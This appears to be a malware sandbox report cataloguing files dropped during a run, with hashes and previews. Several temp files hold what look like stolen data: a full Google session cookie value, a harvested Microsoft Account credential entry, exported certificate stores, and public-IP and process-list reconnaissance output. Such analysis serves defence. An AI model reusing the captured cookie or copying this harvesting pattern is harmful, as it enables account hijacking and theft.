Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiujR6Gu6Yf7SUVligmf6S1Cpr4R89bU/sfuh8m:RrlsNigR6P6YjSUVligmf6SMUkfW
MD5:	5626FE654C16CB9D295BBB5E6CF7D263
SHA1:	79E6438305B36E75CF22071E46B9982E8CCDFBFE
SHA-256:	EA9F7C631953652DC2ABC71C1017FFC2F6D2DF5023F1AECBDFDCCDF2CB2BF193
SHA-512:	C8659ED455A695510606B79C9FC16F1AC8AE2E928C74EB31F01BB1EE14D5114278B3E9ADFA38A9E21F77606E65A8B86DA0E7E78D9D0FCF19DF183DB1BF38CF9D
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.8.<./.P.i.d.>.........

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6D8.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4598
Entropy (8bit):	4.47127645714568
Encrypted:	false
SSDEEP:	48:cvIwSD8zsUJgtWI9cKWgc8sqYjhq8fm8M4J2+ZZFo+q84l0KKcQIcQw0Xd:uITfSTrgrsqY1fJfEuKKkw0Xd
MD5:	8E10C9CBD04E214A674153251B030131
SHA1:	5BDCD81B88B827ACCE262AD44B391632F69A6B9B
SHA-256:	2A0D77193B0F6D2AA309D738725D668CE36D6CD751BDF0B96A6D672D9710FFD2
SHA-512:	15CE67D3A67BD0C9A6DE66687E2CB0FE5E1A388293346B70612ACA2FA1FFDC5E2A3E7B3B62686C2199E1FC8BFA670F1ADBD16A532B1BF427D2EF04DCA57F493E
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483705" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5B9.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 22 23:15:08 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	57018
Entropy (8bit):	2.172216706339119
Encrypted:	false
SSDEEP:	192:L5gq/XeaDvTOO3TvBttwcZgmZoo+0BOFWJ3I6Y+DuK7qiV44ByBFcZO3xkM2AdyE:N/L93zzXBv+E0auKO24SyYIh6WybNe
MD5:	A5AA803CF004737C21E7FE4B812E39FA
SHA1:	5470EE947086DF7B75DC1476EAA1778FB8339C59
SHA-256:	30E0596DFD184AD5A1E98ADA9071D9AD7349863F1945715412D2AE51AD5078A4
SHA-512:	AD2F6C93625B7F43C259774010961BFEE16D0AA375D1EA6BA47A5761AD8D47E0154A7615BCCDD56DBEDFC41DF759E2D71BD7875A39212918AA2FD99F7E2BDB65
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... ........6cb........................4...........$...........$....)..........`.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T............6cb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA3E.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8288
Entropy (8bit):	3.6906445696780272
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiu962u6YfBSUXlRJgmfgSlBCpDh89bZ/sfhTm:RrlsNiM6/6YpSUXl/gmfgSlvZkfY
MD5:	4738295AC0BD255AB82D548976E9E6EE
SHA1:	8C0B147274A45CC54A0DDA8E55A736319FBF4817
SHA-256:	716892525D1DC0B453745907973EA331CAA09E33CC687A2934C3AC36AED00738
SHA-512:	372F81CC05BF1684801660387D56DE250607BA93D829BB24AED33DE4085147D20CF00F28F6D62D6444A6D5432116239688563081220916FBDD8427CE3F787820
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.8.<./.P.i.d.>.........

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB97.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4564
Entropy (8bit):	4.437104514492555
Encrypted:	false
SSDEEP:	48:cvIwSD8zsUJgtWI9cKWgc8sqYjha18fm8M4J2+rFg+q84i2KcQIcQw0Xd:uITfSTrgrsqY1JJstKkw0Xd
MD5:	3E91FEC36650E09C3D132E69381A143D
SHA1:	8D2450664E4CFCA8176DF499C1BA1D57585DEC17
SHA-256:	B86E2947B26F5F54031CE66A13F56CEEFD6FD7F844AABDA2F2CB8F288AFE7D0A
SHA-512:	6DB43BF2A4204A228BFE7F1CF04F67D4A2DA3D31F65F36891C2036079AD62FEFBD79FB1FC538108ED7608121484AB8CFDBC1E03FC828B1D73FFFEDF0A25B56D1
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483705" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
MD5:	243581397F734487BD471C04FB57EA44
SHA1:	38CB3BAC7CDC67CB3B246B32117C2C6188243E77
SHA-256:	7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
SHA-512:	1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\11D3.bin

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.622132112205334
Encrypted:	false
SSDEEP:	6:YM6jkk4RTu/pU98M7ETSHp926Sfp2LiGteoX51TbDgivd4YMrd71DLE7XGsTQ4D8:YJkk4Ri/p4vE6UxfELi/op1Tt4YYd7JX
MD5:	C43011D042577B4134F90BDD1704274A
SHA1:	FC1E43859BDD93F4FDF13CA59BD2CA21EAAEA031
SHA-256:	D2B818504BFEA630B95C1E6A4953F1F04A3D12A0A6BE97BDF7F6E0AD16810DDA
SHA-512:	3901781F972DF85011C8DE5D2BBDE899BC3D5A4C999EFC7BF4807E4E580E365A147BECCC92E45A070417B3CF116B3856E741ABD5A62ACD1F9003FBE1575D6B5C
Malicious:	false
Reputation:	unknown
Preview:	{"id":0,"agent":"CR","domain":".google.com","expirationDate":1617290552,"hostOnly":false,"httpOnly":true,"name":"NID","path":"/","sameSite":"false","secure":true,"session":false,"storeId":"0","value":"204=XlJ-cT9Xg8DDNcFChe-nUGbxxEez8DRPGzgzUdZjP1JdN2YiNhfyRKFYdvFacUiguPGJxNZQxNzSiNVBcKqtq4ja7gbbvS3qQExvrcATH8SyD8dfy7IhIXh65vwy9wvzcYGB8MPR2c8HHGKEWDbc9DczP4qY4Ggc7D8ZFucZfEc"}

C:\Users\user\AppData\Local\Temp\2DBE.bin

Process:	C:\Windows\explorer.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	56273
Entropy (8bit):	7.996224357542867
Encrypted:	true
SSDEEP:	768:IIvyXV5VktP0sPSJdh/3fqEh+B/2DCh/lo14HQB9fT9mDpAcde1hY+9a:gFehSLh/h+BeDC3o2HoZc1Acde1hZa
MD5:	5DC0E3690880ACE2DC54CF8FFBB10076
SHA1:	93FF765CBF15D91D735A8423A1D708C6A67860E6
SHA-256:	DBBD49E56EAB29988406FB2C3BD46DCBD22CFA6DE54163271F6811B87FEEB418
SHA-512:	5AAC8C6CF0928098776A2052DF13D6C49D29E91B81AA5F7E2F16F9458A4AD76D448AD55A9174CF9EA7E45B6215AF975C8EFA4416CE126A1AEE7AB1702FAF94E0
Malicious:	false
Reputation:	unknown
Preview:	PK..............6.T...T......AuthRoot.pfx..Tm.0.T....0.TJ...H........T;..T70.T30.T/...H........T 0.T....0.T....H......0....H.......0... ..6..<C.....S.....~.R.e....B5(8@J.....e..dx'..;.g1.0.u...\|A^.X.k.}FB..Y."H;....#@...%x..R.". .K..`."...`. .^...1..b.C(.J.I=..pr...}.3\5'...~ro.#...e%d..Eq.2n.}.9L]...o...Me..Q..a....z..A.......J.l.+U..;s.....o....c.....I.hU...E.&X..-..G&(....4.....{..:...k.<\|...H...i.g.^........._.9....yB.......&...S.o.....}...../.(......<.R..h.6..+....{...x.J..0r..0.....F."..\.`....'..-.....?..z>.[..<....t.......?..].?H..".r......./tM....[.e...G..8..../..V.\.U..TK.S.H...S.....;...G!d....s..i&Q+rE..l....c...a.5.3-..._#..42X.D..T.:....XY.yM..}".e.G3u..}..R.."./...7.....Y....\..$.8z...._>.....^...\.\.v..>...u.E\...S......./.o.u.m.B........ .}..U.X....H.im..zZi...2?......=....Y...L.-.C.w..BB_.C.....R5W.O.Jv..xHhG.K.v_R2..nfD#.\.Y.k4mA.fR.T....y...U-.e....!.BL.L.dY!Y;......"v...<]..H.[..P../......-f.RzV..}..[..Q*~i.....~.G..

C:\Users\user\AppData\Local\Temp\40F3.bin

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	176
Entropy (8bit):	4.9239681894053104
Encrypted:	false
SSDEEP:	3:1D3SBTvox0BXAXH+CDcNY7gwWASAcX4CDcNY7gwWARKaJFvVoXuoxTKXBFvn:klvm4XAXeCQNY7gZASAbCQNY7gZAdJFt
MD5:	4ABC70CD59387FD60C0E2BF92362557A
SHA1:	A749F9B85477DF3B5AD7D264604C6A33728EEB58
SHA-256:	E9759A1EBC69AFDD14F2FE9385F7B102409AB7DE9E6FB067BDD37DEDC1C9FDBD
SHA-512:	8B49A2F24DE1BC501282D52BFE22DC90B632C5B2D9A37BA8CAF2AC7AC250430154B59215B1B12AFC1F6E4E4A6177DB39FDDAF9F7933FA2231D9E388A844AB8A1
Malicious:	false
Reputation:	unknown
Preview:	type=ED, name=02gdvyuzljfyicmi, address=MicrosoftAccount:target=SSO_POP_Device, server=MicrosoftAccount:target=SSO_POP_Device, port=0, ssl=0, user=02gdvyuzljfyicmi, password=..

C:\Users\user\AppData\Local\Temp\4A44.bin

Process:	C:\Windows\explorer.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	modified
Size (bytes):	8487
Entropy (8bit):	7.970947171896302
Encrypted:	false
SSDEEP:	192:9TEyenUOmZdqTpvNU0L8QZgBwskdjIsYKCUdTnlEnKjfWSSsT:ZESOmW11kwssjTtPdTnCnJC
MD5:	539C130F1681E39D06C982A34AA12388
SHA1:	41E840F5C3852217B3F00635111AD24016F7C299
SHA-256:	269513C07D944E511E32FFA4E811647608E2F9F5FA5B254EF79441CEB267A301
SHA-512:	AC07F3D21E6CDF2FDA5DBE8DCFE5F6C41C72C123CDE3DB9F0C0739413ACF801C0AA3818935D246E21EBEECFEFFAA913DE8DB4037B7FAB4F3CB63CE780C30F8FA
Malicious:	false
Reputation:	unknown
Preview:	PK............3;`.. ..2.......FA5.bin.]{s.8...R...?'.Q.^...D)V.9...T.(...........~..OY.......fj.M.?5..F...v:.#....4Q.C. 8A.i.......9N.....>...k<....6H..\|$...3]........._.}....\|.a.I.\|a.xH0.....D...4..S........q.4~>v.`....I..=.#7...'....U...n.... ..2..M...p..G0.}^.$.....{.K.SM....=..`Z..\|.n..K.}.p.....ar.c.2/....2..........m..zn.p ..(..P<....4..,F.....K+...G...Q...2...........=QXD.$J.V.a6.2.....X.4....<.'..0.......M..Q.....=a4.\|..a..0?X.7..V....QR..W.U.....I;...\|...9.....DU..........u@.C.].&c...(..o.f..<.....Pl2...M+.b=$..:...0.,..gs.......g....#2...;~n.4.{.V..I.\...B.h....B7HG..9...u@pE.0..-..mp..=.-..W^...!MN.]+.}P.=K...r..C.....:..dh.V..(..7......=.v....,..-...z..71c...8T.p.<..NG)............4.4...............(.&....3q(..........!..:......E.}[#E.....\.Y........f_&......2......O[..e.8~...[.aYA{..4~...C3I..zY.9e.?.=.4.. ..(.#--.bW......* ...V..\KM......$-u.".b.=72o.-.B....#H....*`...M...~..3+........^.. xm.Z..'.=.....e.X7.B...M....c.....B..h9....E

C:\Users\user\AppData\Local\Temp\6B3A.bi1

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	120
Entropy (8bit):	4.547063999628148
Encrypted:	false
SSDEEP:	3:cPaRhARtt7TSjjhThARtuV/gRdUI1/v:oMWbtChWb0gRF/v
MD5:	2631AE4F9E9CCDC01D70ED68AB0F989B
SHA1:	5FF93FAFEA8B1B967E04763739BE0B934A6BC737
SHA-256:	27A4EFC4341C7956B1427BAA9324035ECBB27A5E0E6A43BFE317FEC187D23A38
SHA-512:	8A77BEB0ECEFA510E48B1E589755E0FC28DF2CAA71181A606E1726DB6CFAE1FD3CF717A168D245BCC0F9E46AAC8E7F9B481A94749232A34D9A3634756FD5F8E3
Malicious:	false
Reputation:	unknown
Preview:	Server: dns.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 102.129.143.53....-------- ..

C:\Users\user\AppData\Local\Temp\7BC3.bin

Process:	C:\Windows\explorer.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	231
Entropy (8bit):	5.601847956236109
Encrypted:	false
SSDEEP:	6:5joNieWOzIwcrwAzbBUQRqnP/00mCMaJbkzuNioFVl+lX:5joNZWfXVXMHVbWuNJaX
MD5:	0A1900A12DBF525719231660FF2FEFFD
SHA1:	494443C36F9810B620AA11AB135EF9952E2FE7F2
SHA-256:	2931389CC9ACAF29BC088B7BB1A0808402390A259A4C55CE39117C51188A9323
SHA-512:	0278FD3CA223CAD0D7304EF34D6626CE6855A66C342C83410D2801C5FE100D5A41DF5112B5C9243573B3D6C565AF9FF4BCB023F486EBFC333BC270CC676FB2BE
Malicious:	false
Reputation:	unknown
Preview:	PK...............w...........0F3.bin..1..0...B...x......X........DF.]..7.3d...NkBx..lnEhns(5...T._.5..F.xE.$4..{.......}.-....A...D...,..=?.HN.C..z..PK.................w.........................0F3.binPK..........5.........

C:\Users\user\AppData\Local\Temp\B95F.bin\AuthRoot.pfx

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	21650
Entropy (8bit):	7.992099365582824
Encrypted:	true
SSDEEP:	384:ZaHIvAJX1PFVVJEIVkWKXPKgKUrhq+SJdh/gnof1qm7XUELo:8IvyXV5VktP0sPSJdh/3fqEM
MD5:	EEFF88594DA4B325FE39E6374959E0AC
SHA1:	0AD46FFC44467D7BC1870695C982CEB072FA4A8C
SHA-256:	6594E8C35E3F466080D4302CD8845F6C9A27F5DE33CF7786B6FF5E9C6070954A
SHA-512:	F6D2C3E69FB0A02BE25DF78FBF55B01B22B834A483ED01AC4E212F77F4720837272DEFD85DA043AB6FB8E39D2CC3DC604BADA93E755C0FC27AD17A65C6CBD912
Malicious:	false
Reputation:	unknown
Preview:	0.T....0.TJ...H........T;..T70.T30.T/...H........T 0.T....0.T....H......0....H.......0... ..6..<C.....S.....~.R.e....B5(8@J.....e..dx'..;.g1.0.u...\|A^.X.k.}FB..Y."H;....#@...%x..R.". .K..`."...`. .^...1..b.C(.J.I=..pr...}.3\5'...~ro.#...e%d..Eq.2n.}.9L]...o...Me..Q..a....z..A.......J.l.+U..;s.....o....c.....I.hU...E.&X..-..G&(....4.....{..:...k.<\|...H...i.g.^........._.9....yB.......&...S.o.....}...../.(......<.R..h.6..+....{...x.J..0r..0.....F."..\.`....'..-.....?..z>.[..<....t.......?..].?H..".r......./tM....[.e...G..8..../..V.\.U..TK.S.H...S.....;...G!d....s..i&Q+rE..l....c...a.5.3-..._#..42X.D..T.:....XY.yM..}".e.G3u..}..R.."./...7.....Y....\..$.8z...._>.....^...\.\.v..>...u.E\...S......./.o.u.m.B........ .}..U.X....H.im..zZi...2?......=....Y...L.-.C.w..BB_.C.....R5W.O.Jv..xHhG.K.v_R2..nfD#.\.Y.k4mA.fR.T....y...U-.e....!.BL.L.dY!Y;......"v...<]..H.[..P../......-f.RzV..}..[..Q~i.....~.G..cK.N..C.........Q....:(._z.......D..E..

C:\Users\user\AppData\Local\Temp\B95F.bin\Root.pfx

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	34394
Entropy (8bit):	7.994834342667711
Encrypted:	true
SSDEEP:	768:x+B/2DCh/lo14HQB9fT9mDpAcde1+Y+9Z:x+BeDC3o2HoZc1Acde1+ZZ
MD5:	7FE5F5AC1F494905135D4F9136F36DF9
SHA1:	F75961839A75173ABD93DAA642D40EB632E783ED
SHA-256:	DDCFE245FFA184EE824AE4CA264CC95448204CF1F8CAD426751E519C81E73D85
SHA-512:	4A499B0197DDD32CBB7BB35DA229652F1F73B3590CBC8832C93916BBBEDC406C5A14296FD41714EA8BBFDE89DDA815BD6E002E5C38AC63FEE1308E984D6B886D
Malicious:	false
Reputation:	unknown
Preview:	0..V...0......H..............0...0......H..........0......0......H......0....H.......0.......BgI........$.0J?..iq8..G...Qn..8b`..SM..L../..p..Q-ua.>B....]...G.;5.1kO..Go..).7#.Y..U.&$/rwR............2..y.c..o.(......kbz7...>\<... .....o....FAsu..m...'l......)..a.Gh......a.8AK._p.c.....(.E`QP..V.........ld^n..+.cBb.......?.$...E(...d2.v.......#Ew.Gl...\|.\..{.elA.#.@M.I..(~...j7.!.K.x5.z.q%...=.4.iS.d..{>4.9.J.+..$3V.N8..<3G.BU.g.....DCGF....Q..9.v'.2..s0.v@....}i.n...4..."5..-:...^kSBF..F...z...........Sz..\|.[.1.-,..>.c.6.3.J...TX......-0]s..>a.s.x'....}i..S.`.n1...#,L.kJ...JN.....Q..................Qe....6GIQH.....~:....Kz._...XbdT'0&.......D.m....9..C.......uoJp........e.d.}.....G.M4..+.k.........+..1.c,........j.f./....\|.d$.QGR..78..[=.$...E...l..>]8%n]/(g......}..m.._.T....8G>Bh....)v`..F.....6..P......5.O.7.yoK......$&.\|.EIh.].....\8.=...G...+./..H.&.;..bE.....JK)tCr.u`M.........Sf..S.....w.\E{c....)....b.#p...F.}.../..0....FGt._h].

C:\Users\user\AppData\Local\Temp\DFA5.bin

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	48690
Entropy (8bit):	4.015795177782428
Encrypted:	false
SSDEEP:	768:UtEa4IDsCk1CIZgZ8FUGmqrM2o1r7RkQ6OuQVvS/sTkwOieV9gwoLbRdx7yTnaCR:UtEa4IDsCk1CIZgZ8FU1qrM2o1r7RkQg
MD5:	4E1FB3CA94AF45A0C0E85F8C5A0D21DB
SHA1:	5C109AF75612FF843ABA3B97BB059CC1255A8C06
SHA-256:	CA7A394296EA102FB001F075DB439C2B9FD0431209CF9B2A4A31C976E93EF053
SHA-512:	05B3D071FD36C5B8233BC071EB2BEC42C78359955DAD94327A32971CA5DA27BFA1C675227896C492A79B6CF6152251D39C22775FF6D663FAC54F8A986E9B8DAC
Malicious:	false
Reputation:	unknown
Preview:	-------- ..-------- ..Server: dns.google..Address: 8.8.8.8....-------- ....Image Name PID Services ..========================= ======== ============================================..System Idle Process 0 N/A ..System 4 N/A ..Registry 88 N/A ..smss.exe 296 N/A ..csrss.exe 404 N/A ..wininit.exe 480 N/A ..csrss.exe 496 N/A ..winlogon.exe 576 N/A ..services.exe 588 N/A ..lsass.exe 6

C:\Users\user\AppData\Local\Temp\DFA5.bin1

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	64
Entropy (8bit):	3.7032231490673295
Encrypted:	false
SSDEEP:	3:111QQL/vMPOJGQRtnV:LuE/vY3QbnV
MD5:	A6C80D7ABE59ABCD1A9B8FFF2EA68C13
SHA1:	57745CEDDB11D61B8F6713C0E65B67041476DBC8
SHA-256:	0C10B4BB1CE8C0DE6A6FD6927D406C9C27A0F9193D6DFC2615D5FF4CBCC53B54
SHA-512:	B41FF8FF7305709880BFB9EC4690F8C43E61CC0AB02954E3C5D4776EFFBDD58AB3BDD7A54BB769C3AFE63DA2B6187C0E78CB8D0C9407D580D3E533AB07B1D117
Malicious:	false
Reputation:	unknown
Preview:	-------- ..-------- ..Server: dns.google..Address: 8.8.8.8....

C:\Users\user\AppData\Local\Temp\FFD3.bin

Process:	C:\Windows\explorer.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	413
Entropy (8bit):	6.804176990395002
Encrypted:	false
SSDEEP:	12:5jdFRkhQ/Pxdl0wjDlSZ06m2PHneb3Vd/QRgYnEao:9tJxMOoZDP0ldIgr
MD5:	45D77B0EBA063618E5E195F23C7D7F6A
SHA1:	E1F6524F830F7CDB001DFA016D37B83DF5F947DB
SHA-256:	BF12815E117D1386AABFC1467EA256EB6A2015CB4F92E1FDE02799B2986BD6A1
SHA-512:	4F5959EDA2F608053EE72206FB0393F94D1C004FE012635EB7A5A68D8A5617749BF0CD7647BC1EA1AAF51DC9378FDDC64C99CBD0229D9994C8ADBDAE0C61C83E
Malicious:	false
Reputation:	unknown
Preview:	PK............M..6-...z.......1D3.bin=..r.0...%k.HQ~f.....R.m.].!.A...t.....=......X..i..%...X.`...X!..%......I.e5., .....\.ui..' +..^..0R.7D.............MW.3.......{..5..&.bC.F.\|.7...#.....P..]YR^N.v....j...ZgdZ...M2j....$:{.m..!s.t.wV.t..GF[...n...1`....*^)g..8..jo.]._..-......d.)[.......J{.\|.k...3?a.u.GO.B.X.Zd.8JM....PK..............M..6-...z.....................1D3.binPK..........5...R.....

C:\Users\user\AppData\Local\Temp\RES5B2D.tmp

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	4.016433142954216
Encrypted:	false
SSDEEP:	24:HeMm9maw8Z2cigIaHohKdNwI+ycuZhNluakSavPNnq9Sd:+RnI+tKKdm1ulga3sq9C
MD5:	F53B3E94AB4B81FE3036DF4A0D4AE4E4
SHA1:	134B577D44E8342C5BB6B4932242F9054F0FAE77
SHA-256:	040D9B2AC93287D911754B897FEF6DE753C6F0A9C31EC8005BD3AAFC8923E54A
SHA-512:	B641D8EBBC5892CECC8ADACC7B8726A1085F1B08E3B587F796C4F41F71C21AA5C9E345E05FFC6AD6A39FA17361BC6A5EC5932C0E9285A30C93EF1D50C36DAB50
Malicious:	false
Reputation:	unknown
